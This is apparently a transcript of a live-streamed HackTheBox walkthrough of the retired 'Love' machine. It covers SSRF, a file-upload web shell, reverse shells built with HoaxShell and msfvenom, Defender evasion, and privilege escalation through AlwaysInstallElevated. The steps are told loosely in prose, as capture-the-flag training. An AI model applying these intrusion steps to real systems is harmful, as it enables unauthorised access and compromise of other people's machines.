And we are live. What is up, everyone? Welcome back to Hack Smarter Live. My name is Tyler. I am the host for, I don't even know what to call this, a live stream, my YouTube. So we are streaming live right now to 3 different platforms. We are live on YouTube, we are live on LinkedIn, and we are live on Twitch. And what we are going to do is dive into some hacking. Now, before we dive into it, let me just be very clear. What's going to be different about this stream than maybe other content creators you watch is I do not prep this ahead of time. So when I stream, we pick a random machine from HackTheBox to try hack me, and we dive into it blind. And I share with you my frustration, my challenges, the rabbit holes that I fall into, hopefully to help you feel a little bit better when you make the same silly mistakes I make. So what we are going to do today is we are going to pick up where we left off yesterday. We were working through the love machine on HackTheBox. We've streamed it twice now. Those videos will be coming out on my YouTube channel. I release new videos on YouTube like every other day, basically. So those videos will be coming out. I think part 1 just released the other day. Part 2 will be releasing soon. So this will technically be part 3, but if you've been following the live stream, you get to live ahead and you get to live in the future. My goal today is hopefully we can finish the love machine on HackTheBox. We were able to get user and we were able to get a shell in my last stream. I'm hoping we can upgrade that shell, get it a little more stable, and begin some post-exploit enumeration. See if we can elevate our privileges. Without any further ado, let me go ahead and share my screen. We are rocking Parrot OS again, and I'm gonna make sure I'm not missing anything in the chat. LinkedIn always makes me refresh it to see the chat, which is silly. So I want to say a special hello to all of you watching on LinkedIn, all of you watching over on Twitch, and as well as those of you on YouTube. Want to say a special congratulations to Zach over in the YouTube chat. He said yesterday morning when I was streaming that he was going to take the Security Plus that day, and he passed. So Zach, congratulations again. Good work on killing that on the Security Plus side of things. So guys, I would encourage you, if you want, hack alongside of me. I am doing a retired machine on HackTheBox because HackTheBox does not allow you to stream active machines. And because it's retired, you do need a VIP subscription to access this machine. So if you don't have one, you just have to live vicariously through me. If you do have a HackTheBox subscription, feel free to join me as we work our way through this machine. If we pull up love, I already launched the machine, so it was ready to go. And I have Cato pulled up, but that's the extent. Let's go ahead and quickly review our notes. Let's see where we've been at. So here are our notes. We fell into a rabbit hole, and I want to spend some time, if or when we complete this machine, I want to spend some time digging into like this weird SQL injection I found. So when you first get through this voting system, and I manually checked for SQL injection, found it through SQL Map Edit, was able to dump hashes and things like that. But that was apparently a rabbit hole. So I don't know if that's an intentional or unintentional rabbit hole. I'm very curious about that when we finish this machine and can look at like OXDF's walkthrough, see what he has to say about that. But what we were able to do is there was a vhost called staging.love.hackthebox, which takes URLs and look like classic SSRF. We were able to do SSRF, and if you remember, we went through another rabbit hole, but it was a good learning rabbit hole where we use SSRF to read files locally on the system. So that was cool. We had full file read, and we also found stored cross-site scripting, of course, out of scope for a HackTheBox machine, but I always like to check for that because in a real web app pen test, anytime I see content being reflected on the page, I'm always checking cross-site scripting. It's a good voluntary report on bug bounty. I think the last time I reported on bug bounty, I made $300 or $400, so always a good thing to check for. We confirm SSRF on the local host. We had the full directory path based on some error messages. Long story short, we were able to get credentials by doing SSRF to a password manager hosted on port 5000. We had admin credentials for this voting thing, and the voting thing had a CVE for being able to bypass, really the upload bypass, upload a PHP shell, and we had a full web shell. We used that web shell to, for some reason, the reverse shell didn't work, but a web shell did, and we used that web shell to get hoax shell launched and running, and we had a full shell on the machine, and we got the user flag. So that's kind of where we have been. Let's pick up where we have left off. I am going to have to repeat some of these steps because, of course, the machine has been restarted since then. I want to make sure I don't have a space in here. So you can watch me repeat these steps. We'll go ahead and get Firefox pulled up. Let me grab Cato here. Grab Cato, throw Cato over to the side. Throw this to this side. And we will go to love.hackthebox. Here we go. And we know it's admin. I have the password from before. Okay. Oh, we need to go to the admin page. My bad. There we go. Now it should work. Admin, password, and we are logged in. And I should just ask, guys, if anything sounds off on Twitch, YouTube, or LinkedIn, please let me know in the comments. I am managing all of it while talking, so it's hard for me to see if everything's working good. From what I can see, it's looking good, but I can't hear it. So guys, if anything sounds off, looks off, holler at me in the chat, and I'll be sure to check that. But here we go. We had this dashboard, and if we look at this CVE, I think I dropped it in my notes. I'll just show you the CVE in case you missed the stream, get you up to speed on this. I'll go ahead and copy this. So if we look at this CVE right here, it's really doing a upload request on admin candidates add.php. This is unauthenticated. I couldn't get to work unauthenticated, so I do think you need to be authenticated, at least with this specific setup. But you're just adding a user to this, and this is doing who am I just as a POC. So we go over to candidates, and we'll do new candidate. And here was, I'll show you guys how I bypass this. You can't select a position, but I did some elite JavaScript hacking to do that. I'm gonna call this web shell, and the photo, let's go to here, drop this to the side. Which one did we use? I don't think it was that one. Not all of these work. That's like a full reverse shell there. Let's see, post shell.php srf map. Oh, I think I just actually grabbed it from Cato. So if we actually look at replay, we'll be able to see this here. Here was a shell I did. Very basic, just in HTML to make it look a little bit nicer, but it's going to be a web shell. So I'm actually going to copy that, and we'll drop it here for our notes, and we'll just call it like, I don't know, shell2.php. Paste that in, and we'll pull up Cato again, go to intercept, go to browse here, we'll do shell.php, and here's an issue you'll run into if you click save. It's going to say please select an item from the list. You can't do it. So then on stream I showed you guys my elite JavaScript hacking skills, where I just said no and no, and that allows you to bypass that. There we go. So we have our web shell. If we open this image in a new tab and say, who am I? We confirm have our web shell. Now what I want to do, initially I was trying to like upload a shell from here and save it to the temp directory, the Phoebe directory, but it didn't work. For some reason it didn't like that, but Hoax shell works. So let's see if we can get Hoax shell. And then from Hoax shell, I might upload like an interpreter shell to get a little more stable of a shell. So if we go to Hoax shell here, first, what's my IP? Do I have the same IP? No, I don't have the same IP, so I'll have to update my IP on there. Because I think I have that right here, yeah. So let's grab this payload, which is a very strange way of doing a shell, but as of the last time I tested this, this fully bypasses an updated version of Windows Defender. So I don't know if Windows Defender is on this machine. I didn't actually check, but it might be. And if it is, this does bypass that. And that could be why my other shells didn't work if they were getting stopped by Windows Defender. But let's go ahead and go to Rev Shells, Python 3, Hoax Shell Listener, -H for help. And so what we are doing is we are going to do -T for the type. I think it's CMD. Was it CMD curl or something? Let's do list payloads real quick. List payloads. Okay, it is CMD curl. All right. So then we'll do Python 3 -T for type for CMD curl. And we're actually going to change our port over to 1338 because Cato's running on 8080 by default. So does Burp Suite. So we have that going. And then let's go ahead and grab this and paste it in. That didn't do anything. Okay. You know, always different. Depending on the day. Do I still have a shell? All right, let's try it again. There we go. And now we have a shell. So let's go to C, users, Phoebe, go to documents. Okay, and then let's go ahead. We'll rename this tab to Hoax Shell. And I want to get a better shell on here. cd HackTheBox love. And I'm trying to remember the syntax for MSF Venom. I always had it all memorized when I was doing OSCP, but now I don't. Let's see if we can get an actual interpreter shell. Get Metasploit open there. And so I believe it's x64, so that should be fine. Let's go ahead and give this one a shot. If we do MSF Venom -P Windows interpreter reverse TCP, L host equals 10.10.14.14, L port equals, we'll do 1337-F equals this, and I can do shell 1337.exe. And we'll use multi-handler here. Maybe. What, does Metasploit not feel like working in my parrot box here? No. And neither is MSF Venom. What is broken with this? This is like default parrot, so maybe there's just something weird with it. It says it created it, but why is Metasploit not working? If so, we'll just do it manually. If I just do search exploit. Nothing. Okay, well, we might switch back over to Kali, but in the meantime, we can do a basic shell. Something like this might work. Does MSF Venom work for sure? Okay. MSF Venom -P Windows shell reverse TCP L host equals 10.10.14.14 L port equals 1337.exe shell to 1337.exe. Yeah, it might be older. Unloadable payload. There's something broken with my parrot box and MSF Venom. I think that's pretty obvious. So let's do it a different way. All right. So anytime you're hacking, you should always have a backup method. I think I have the netcat binary here. I do have netcat 64. So sudo python 3m server 80. Let's host a simple Python web server and cert util URL cache -f 10.10.14.14. Was it netcat 64 or just netcat? Netcat 64. Okay, netcat 64.exe, and we'll save it to our current directory. It's not saving it. So let's see. Okay, I think Defender might actually be running on here. That's what it seems like to me. Now, I do have a tool that I made, but it's not public. I don't know if I'll use it. I have a tool that I made, guys. I can't explain how it works, but it takes L host and L port, and it gives you a full reverse shell that bypasses Defender. I'm not going to do that, though. We have Hoax Shell at least. Maybe Hoax Shell will be good enough if we don't kill our shell. Can I just echo test? Okay, and I want to make sure I can also download documents. So if we download, I guess we can download that post request. Let's do that. So cert util URL cache f 10.10.14.14 post.txt. When a net cache entry is 1. Okay. Now I want to play around with this for a little bit so I understand exactly what is going on. Do we have this? So there it is right there. What is broken? My parrot machine seems to be buggy, to say the least. We might switch over to Kali. Hold up. Let me see if my Kali machine's configured. I don't know what parrot's doing to me now, but I'm pretty sure it's not showing proper behavior. This isn't how it should be working. So let's go ahead. I'm going to disconnect from the VPN here. I'll share my screen in just a moment, guys. I'm going to completely switch VMs. Yeah, Parrot's being rough in real time. I don't know what his issue is, but it's being buggy. My Kali's buggy as well. Probably because I've broken it, but I think it will do this. All right, so what we're going to do, we're going to switch to Kali. All right, we'll see if that fixes our issue. Worst case scenario, we'll go to the attack box. If all my VMs are just like trash from the stuff I experiment with them on. Kali's opening up right now, though, so it should just be a second, and I'll go back to sharing my screen. Water break. In the meantime, let me go ahead and get caught up with the chat. Make sure I'm not missing anything. John said, hey, don't you have a day job? I do, but yeah, I think the one person answered it for me. I do, but I'm on PTO this week. I took PTO off. Or I took this week off with PTO. So my kids are in school right now. My son is preschool just for the first half in the morning. And so while he's in preschool, I'm like, I'm going to hack stuff. And when he gets off, I jump off my computer. Which box are we doing today? We're doing the Love Machine on HackTheBox. Let me go and check out LinkedIn real quick. That's good. Let me check out Twitch. Tyler, how's it going? Got my Parrot box set up for HackTheBox, working my way through the starting boxes. Awesome, Haircut Fish. As you saw, my Parrot machine didn't feel like doing stuff properly, but once again, it's probably not Parrot, it's probably me, if we are honest. Hulk Show won't support PowerShell. Yeah, I got that. Nice wallpaper. Thank you, dude. I'm going to switch back over to here just while I get everything logged in. You guys can look at my face. It looks like my brick wall needs to be fixed behind me too. You guys see that brick wall behind me? It's actually just like fabric. It's not real brick. I work in an unfinished basement, but it makes it look nicer. But looks like my brick wall's bent a little bit. Yeah, I can see it bent a little bit. Normal brick walls don't do that, I don't think. Do. We're almost there, guys. Okay, we're back on here. I have no idea what VPN's on this machine, so we're just going to re-download the VPN. I closed that connection, so I don't know why it says it's active, but let's go ahead and download another VPN. Five. Oh, wow. We need to adjust this. When I made my Simply CyberCon talk, it was made with Kali right here. And so all the text is quite big. I'll still make it big so you guys can see it, but we'll drop it down to 14. Okay, I think this is number 5. Okay, I think we're in business. I think we're connected. We'll go ahead and make a folder for this on Kali, and let's see if we have a connection. I don't really need Kato, I don't think, so for now anyways. Grab that, sudo nano etc host. There we go. Picking up where we left off. admin. And I think our web shell should still be there as well once we get logged in. So I won't have to repeat all my steps at least. There we go. That was quick. Quick for me to get right back to where we left off, switching VMs and everything. But I'm telling you guys, when it comes to hacking, even in the real world, like, just expect the unexpected. You have to be able to switch things around like that fast and keep working with things. So we have candidates here, open image in new tab. Dang it, our shell broke. That's fine. If I do just web shell PHP, we could try this one. Wolf usually works, if I'm even saying his name right. Wolf. One of these will work. Oh, here's the one I was using before, so we'll just use this one. Our very buggy PHP shell. All right, we have our web shell. Now, last time when this happened, hoax shell wouldn't work anymore, so I hope I didn't break hoax shell as well. Web shell, let's call it web shell 2. Home, HackTheBox, love, web shell. Did I forget something? My elite JavaScript hacking skills. I could just turn, I could just turn required off too, I suppose. All right, we have our shell back. Not mean to do that. Switch this over here. I think I have hoax shell on here somewhere. Okay, you can see I've used it a lot. Oh, just home Tyler hoax shell. Okay, that's fine. And Python 3 hoax shell listener.py d cmd.curl -p 1338. Oh, sweet. Maybe not sweet. It didn't give me a command though. So it's detecting our previous shell. I wonder if that's going to give me issues. Let's try 1337 and get our payload pulled up again. So we need to update this right here. Copy it. And it's not working. Okay, well, it looks like after we do hoax shell once, it tends to break. So we know it has, or we don't know for sure, but I'm quite certain it has Defender running. Hoax shell is able to bypass that. Let me know if you guys have ideas. Oh, check the listener IP. Is there a mistake there? Okay. I might have to just reset the machine, to be honest. Oh, there is a mistake, dude. Good call. You the king. Oh, cool. All right. Dude, who said that? Emmanuel, you're my hero for this stream. I told you guys, I miss obvious stuff when I'm on stream like this. Like, you know, using the wrong IP. All right. So we have this. It's going to be a lot of files because of the exam stuff. I don't know if that has any CVEs with it, and you like unquoted service pass. If we go to program files, let's see if there's any interesting files on this computer. So we see Windows Defender, common file, CU Assistant, modifiable window. I don't know what REMPL is. VMware, everything else looks normal. Do not know what this is. This uses REMPL. This is a UAC bypass. We don't really need that yet. Why did this come up when I searched for REMPL? Weird. Oh, maybe it's just something normal. Okay, well, it's not a virus. I can tell them that. So we have logs. That might be interesting. So it's some type of remediation thing. Okay. Nothing else really there that stands out to me. And we did this, right? We don't have any special privs. No. And we just have the administrator stuff. Okay, nothing else really interesting there. So I wonder if credentials are being stored somewhere. Let's just see. Can I be administrator? Just give me administrator permissions. Oh. So I don't think any of this is actually helpful to us. Okay. Was there stuff in Phoebe's folder that maybe I missed? Okay, I can't do that from here. Is it force? Alright, apparently that doesn't work for Hoax Shell. There's nothing on the desktop, I don't think. Just want to make sure I didn't miss anything. I don't think so. Huh. Alright. System info. I doubt it's like a kernel exploit, but shoot, maybe. So, I mean, it's slightly out-of-date version of Windows, but not really. I'm sure when this came out, this was like the most up-to-date Windows, so it's probably not going to be some kernel exploit. Thanks, Roy, whoever Roy is. Checking out the comments. Guys, if you have any ideas, let me know. Unless you looked at the walkthrough, then I don't want to know. We'll see if we can do this on our own. Once we get to the walkthrough, we'll look at it together and see if we can figure it out. Kind of stuck on what to look at, so let me look at my notes on privilege escalation. We have post compromise, but I think I have hacking guide might have it. This is web hacking. Oh yeah, Windows. So manual enumeration. See if any of this will be helpful to us. We did that. I guess we could do who am I groups. I didn't do that. Okay, if I, you know, learn how to spell, that'd be a good starting point. I don't think any of those groups stand on me. I don't even have Phoebe's password now that I think of it. If I could just get Phoebe's password, that would also be helpful. Net user, net local group. I already did some of this stuff. ipconfig is not going to help us much. We could try some password hunting. Okay, that looks very easy to follow, doesn't it? You could pull that into a little JSON formatter and clean it up. Wow, these are just going to be like all registry stuff, I think. Yeah, we just gonna ignore that. I mean, I doubt this. This would be a cool, if I make another CTF, this would be a cool way to do it. Like have it hidden, have password reuse with the, like the local Wi-Fi network that you find it that way. SC query WinDefend. Oh, it stopped. Is it not running? Last time I did WinPeace AZ Cowboy with Hoax Shell, it killed my shell. Let's try to do what I was doing before, guys. Let's try to do a interpreter shell now that I got out of Parrot, since Parrot was broken apparently. Let's CD HackTheBox, CD love. Pull this to the side. MS Venom cheat sheet. And we'll see if we can get a full interpreter shell. If Windows Defender isn't actually on, and then we can upload and enumerate a lot easier. And then maybe with stable shell, we can run WinPeas and see what we can get out of that. So MSF Venom, MSF. Oh my goodness, come on. All my VMs are dying, guys. I'm typing this, not doing anything. Windows interpreter reverse TCP lhost equals 10.10.14.14 lport equals 443. C. Should run this as sudo. Okay, well, at least created the payload, so it's doing better than Parrot so far. Let's just see if we can even grab that. Cert util. Is it dash URL cache? Oh, the Windows Defender isn't on. What am I confusing myself for? Set our payload to Windows Interpreter versus TCP. Options, set lhost 10.10.14.14, set L port 443, run. Okay, beautiful. We have an interpreter payload. So I might just switch back over to using Kali. That was much smoother than when I was trying to do that with Parrot. Sorry, Parrot. But now we have a full interpreter payload. Now things should be quite easy. We'll go ahead and well, let's just do this. You guys ready? If we do sessions, so let's background this. I highly doubt this is going to work, but actually I think we need to enter the session one. Okay, it was worth trying at least. HackTheBox, love, locate WinPeas, CP home, Tyler, HackTheBox, driver, WinPeas. All right. We should be able to just upload, I think. There we go. Let's see what WinPeas says for us. Let that do its thing. I'll check out chat while this goes. Make sure I'm not missing anything. Refresh LinkedIn as usual since it doesn't show me the comments unless I refresh it. Everything there seems to be going good. It doesn't show me all the comments. People have commented, and I don't know. I need to figure out how to stream better on LinkedIn, apparently. But if I don't see your comment on LinkedIn, join Twitch or YouTube or something. I don't know why I don't see them. Okay. Well, let's check out some of this stuff while we look for import files. We'll go to the top. And anything interesting we find, we'll drop into our notes. Okay, WinPeas. Our basic system stuff, we already kind of checked that. This is just telling us the patches that are on. Computer name. Nothing interesting. Destiny on Twitch said, what's a good platform to use for bug hunting, Tyler? I'll be honest, I haven't done much bug hunting. I do pen testing for a living, so like I usually don't do bug bounties. I've only gotten 2 bug bounties, but I haven't spent a whole lot of time on that, and that wasn't through a bug bounty program. It was through a website that had their own like vulnerability disclosure process, and I found the vulns on their website and reported it. One was stored cross-site scripting. I think I made $300 or $400 on it. My last one, which is pretty cool, I was able to dump a bunch of data on users and MFA tokens and stuff, and they paid me $2,000 on that. But I haven't used a major like bug crowd or hacker one. I think Nahamsek has some good info there. Would be much more helpful to hear from him than me. So this is weird. It seems like Defender is on, but it said stopped. I don't really know. We have some path exclusion, so this would be helpful if Defender does like turn back on. I want to get a picture of this, because if these are path exclusions and we can write to that, Defender won't scan those directories. We'll drop that there. UAC is not on. No prompting. We could check some PowerShell history. Let's copy that. Something that we want to check. Oh, always install elevated. Okay, I believe we can abuse that. So let's grab that as well. See if anything else stands out to me. Auto login credentials. Can we pull those credentials? Probably not without admin rights. That'd be something we dump, like for lateral movement. DLL hijacking, maybe, but I doubt it. There's my There's my hook shell. Okay. Are any of these interesting? Nope. It's texting me. Oh. Installed applications. Okay. We're not going to be able to start that. So we can't really abuse unquoted service paths if we can't restart the computer or stop and start the services once we replace stuff. All right, let's do a fast overview of this. Oh, what things are listening? Maybe there's a weird port listening. Nope, all standard stuff. Security package creds. More user stuff. And then we have, of course, some PHP files that might be interesting. I'm going to go ahead and do this. Let's copy this stuff. I'll look at some of this stuff myself if we need to and see if we can get anywhere. I'm going to stop that. No. Did I lose my shell? Just terminate, whatever. Might start my shell over. Yeah, it's kind of broken. Back to the beginning. Well, do those creds probably don't work for Phoebe. I was thinking cred reuse, but well, maybe it's running as Phoebe. Let's just try it. When rm-u Phoebe-p. Be nice if I get a shell this way. But I doubt it because they want the frick. They wanted you to get a shell like the way I did it, I'm pretty sure. Why? Yeah, I'm just going to assume it's not going to work. Yep. That died. So there's something running to clean that up. What time is it? I'm completing this before I get my son from preschool, so we have to look at the walkthrough we're going to. I really want to have time to look at the SQL injection stuff. Yep, that's dead, so we have to redo our entire process again. Ah! I thought I turned that to freaking false. All right, let's redo the process again, ladies and gentlemen. Let it close the session. Get that up. That's the correct IP this time. No, not this again. Gosh dang it. Well, we might be able to use this shell. I had this issue last time when I was trying to do hoax shell again. No matter what I do with the port, it breaks. So I guess that's why hoax shell isn't the best thing to use. If I do dir c users Phoebe desktop, isn't that where my shell was? Okay, I still have my shell. So what if I run this? Oh, do we still have it? Oh, look at that. It's still there. Beautiful. Okay. Thank you, Interpreter. I'm glad I set you up. I really do appreciate it. Let's go back to some of the enumeration we wanted to do. So always install elevated. This might be our path in, I think, actually. I think we can like make a fake MSI and install it and get a shell. If I remember properly how this works. And because there's no Windows Defender, this might be quite likely. Where's the page on it? There we go. Okay, yeah, that's what I was thinking. Yep, I was right. So we might be able to abuse that. And there's no UAC, I don't think. Ooh, we might be able to automate it. Which sessions was it? Set session 2. Set lhost 10.10.14.14. Set lport. Fingers crossed. We did it. You guys got that? Privilege escalation. Always install elevated. We are into authority system. We can go get the final flag. Beautiful. We got it. Teamwork makes the dream work. Now let's do some research on this, right? Let's understand what is going on and read some walkthroughs and compare our methodology, see maybe what we learned, what we missed. But let's do this flag first because that always feels good. I would say the root flag was pretty easy. We did it. Low's been pwned. Root flag, we'll call it, I'm going to call it easy. Because once you discover that and you could automate it with Metasploit, it made it pretty easy. Now, with that information, let's look at this. I want to understand the SQL injection. I want to understand some other methodologies to approach this box. I want to see what I can learn, what I missed out. And so let's look at this. I think that difficulty level's pretty accurate, the user rated level. So we did that same thing, lots of ports. Can't glean much about the OS. Probably a good guess it's Windows 10. It's running Apache. I tried that as well. Okay, yep, so that's the vhost. There was SQL injection, though. That's... Maybe he means it didn't lead anywhere because it didn't work. Because I was dumping hashes with SQL injection on that login screen. They did search exploit, directory brute forcing type stuff. Okay, I'm guessing this is all the same as me. Scanning application, we use that to... Let's see how he ended up enumerating this. Yep, I did the same thing. So if you guys remember, that's how I tested it as well. So I'm glad I did it properly. And then he checked 5,000. That's, of course, that password. I was doing that to read files. I thought my way was cooler because I was reading files on the local system with SSRF. So RCV is search exploit. Oh, so I did it manually, right? When you can do it manually, do it because it works better. It looks like he tried to automate it. It didn't work. I looked at the Python code, and he debugged the Python code itself. But you guys saw what I did. I just did it manually. What was this actually doing? Oh, this is through the vote system. So I didn't even do it through the vote system. I did it through the candidate thing. So that's cool. A couple of different paths to get that shell. Okay, let's see how he did it manually. Oh, so he did in the photo there of like the user's photo. I see. So he did WinPs as well. He checked always install elevated. Okay. He used MSF Venom to create it manually. We use Metasploit. All right, so pretty similar. I want to see if anyone goes into detail about the weird SQL injection that we found. Let's check out these two, and then I'll be done with my post-ponage research on how exactly the box is working, specifically that weird SQL injection I discovered in the first stream. All right, hacks is hacking made easy. Let's see how this person approached it. He didn't even try SQL injection, or he or she. They found the SSRF. Okay, so no talk about the SQL injection. Am I the only one who did the SQL injection? I feel like I'm crazy now. What? Okay. Love HackTheBox SQL injection. There was SQL injection there. Why does no one talk about this? Oh, okay. I see SQL map here. Okay. All right. This is what I did. All right. Glad I'm not the only crazy one. Okay, exactly what I did. I dumped this same stuff. Yep, okay. Same exact issue as him. I was doing that offline because of the time-based side of it. So he kind of used SQL injection to find the admin directory. Okay, so the SQL injection really was a rabbit hole built into it. What's unique is not everyone discovered it. So I'm going to give myself a pat on the back because I found it, even though you couldn't actually exploit it. But in a real web app, that is something you would check for, and you would definitely report that to a client if you found SQL injection. And the way you would test that would just be like a time-based SQL injection, so it sleeps for 10 seconds or whatever it is, and then we would have that SQL injection done. Looking at the time, 9:19. We still have time to stream, so We'll keep streaming. I am going to sign off, though, for the actual recording. So for those of you watching this after the fact on YouTube, thank you for being here. Hope you learned something through the way we approach this love machine. Glad we were able to elevate our privilege to NT system authority. Exciting stuff. But for those of you watching the recording, I will catch you guys in the next one.